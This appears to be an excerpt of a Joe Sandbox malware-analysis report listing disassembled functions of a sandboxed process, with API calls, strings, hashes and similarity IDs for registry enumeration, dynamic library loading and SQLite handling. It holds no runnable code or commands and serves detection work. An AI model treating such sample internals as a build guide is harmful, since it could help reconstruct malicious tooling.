                                                                                                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                                                                                                          • String ID: advapi32.dll
                                                                                                                                                                                                          • API String ID: 2012295524-4050573280
                                                                                                                                                                                                          • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                                                                                                                                                          • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00410030 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                                                                                                                                          • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                                                                                                                                          • <%s>, xrefs: 004100A6
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$_snwprintf
                                                                                                                                                                                                          • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                                                                          • API String ID: 3473751417-2880344631
                                                                                                                                                                                                          • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                                                                                                                          • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040A178 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: wcscat$_snwprintfmemset
                                                                                                                                                                                                          • String ID: %2.2X
                                                                                                                                                                                                          • API String ID: 2521778956-791839006
                                                                                                                                                                                                          • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                                                                                                                          • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                                                                                                                                          • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040D5D6 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _snwprintfwcscpy
                                                                                                                                                                                                          • String ID: dialog_%d$general$menu_%d$strings
                                                                                                                                                                                                          • API String ID: 999028693-502967061
                                                                                                                                                                                                          • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                                                                                                                                          • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00408D96 Relevance: 10.2, APIs: 8, Instructions: 159stringCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpy$memsetstrlen
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2350177629-0
                                                                                                                                                                                                          • Opcode ID: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                                                                                                                                                          • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0042ADCD Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 217COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                                          • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                                                                                                                                          • API String ID: 2221118986-1606337402
                                                                                                                                                                                                          • Opcode ID: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                                                                                                                                                          • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00408F2F Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 265355444-0
                                                                                                                                                                                                          • Opcode ID: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                                                                                                                                                          • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040C3C3 Relevance: 9.1, APIs: 6, Instructions: 109registryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                                                                                                                                                                                            • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                                                                                                                                                                                            • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                                                                                            • Part of subcall function 0040A9CE: ??3@YAXPAX@Z.MSVCRT ref: 0040A9DD
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040C439
                                                                                                                                                                                                          • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                                                                          • _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                                                                            • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                            • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                                                                                                                                                            • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                                                                                                                                                            • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040C4D0
                                                                                                                                                                                                          • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??3@$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1973883786-0
                                                                                                                                                                                                          • Opcode ID: 43de9e52db830488c7ebdb2928a6c49d702693ce72869a855233a6d80c0cc9be
                                                                                                                                                                                                          • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 43de9e52db830488c7ebdb2928a6c49d702693ce72869a855233a6d80c0cc9be
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004116DD Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 82COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 004116FF
                                                                                                                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                                            • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                                                                                                                                                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                                            • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                                                                                                            • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                                                            • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                                                                                                                                                                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                                                            • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                                                                                                                                                                                            • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                                                                                          • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                                                                                          • API String ID: 2618321458-3614832568
                                                                                                                                                                                                          • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                                                                                                                                          • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004185CA Relevance: 9.1, APIs: 6, Instructions: 78COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 004185FC
                                                                                                                                                                                                          • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 0041860A
                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00418650
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??3@AttributesFilememset
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 776155459-0
                                                                                                                                                                                                          • Opcode ID: 0f4d7603f8fb496cf733ea50d928d497895b02188797bdb70aeae8633e108f7d
                                                                                                                                                                                                          • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0f4d7603f8fb496cf733ea50d928d497895b02188797bdb70aeae8633e108f7d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004174F5 Relevance: 9.1, APIs: 6, Instructions: 61COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                                                                                                                                          • malloc.MSVCRT ref: 00417524
                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00417544
                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00417562
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??3@ByteCharMultiWide$ApisFilemalloc
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2308052813-0
                                                                                                                                                                                                          • Opcode ID: 6248b2b7f6a479c554c71b0c61ae383c8a643aca280bf9f33ef5fcf46466946d
                                                                                                                                                                                                          • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6248b2b7f6a479c554c71b0c61ae383c8a643aca280bf9f33ef5fcf46466946d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00418197 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                                                                                                                                                          • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0041822B
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: PathTemp$??3@
                                                                                                                                                                                                          • String ID: %s\etilqs_$etilqs_
                                                                                                                                                                                                          • API String ID: 1589464350-1420421710
                                                                                                                                                                                                          • Opcode ID: c8350a72466cbc4bd1e5c41b0b1d0b837946de2a99fd363d48ea7ac73f264160
                                                                                                                                                                                                          • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c8350a72466cbc4bd1e5c41b0b1d0b837946de2a99fd363d48ea7ac73f264160
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040FD9E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040FDD5
                                                                                                                                                                                                            • Part of subcall function 00414E7F: memcpy.MSVCRT ref: 00414EFC
                                                                                                                                                                                                            • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                                                                                                            • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 0040FE1F
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                                                                                                                          • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                                                                                                          • API String ID: 1775345501-2769808009
                                                                                                                                                                                                          • Opcode ID: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                                                                                                                                                          • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00414770 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40fileCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0041477F
                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0041479A
                                                                                                                                                                                                          • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General), ref: 004147C1
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: wcscpy$CloseCreateFileHandle
                                                                                                                                                                                                          • String ID: General
                                                                                                                                                                                                          • API String ID: 999786162-26480598
                                                                                                                                                                                                          • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                                                                                                                                          • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040973C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ErrorLastMessage_snwprintf
                                                                                                                                                                                                          • String ID: Error$Error %d: %s
                                                                                                                                                                                                          • API String ID: 313946961-1552265934
                                                                                                                                                                                                          • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                                                                                                                                          • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00435A61 Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 394COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: foreign key constraint failed$new$oid$old
                                                                                                                                                                                                          • API String ID: 0-1953309616
                                                                                                                                                                                                          • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                                                                                                                          • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00431671 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 231COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                                                                                                                                          • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                                                                                                                                          • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                                                          • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                                                                          • API String ID: 3510742995-272990098
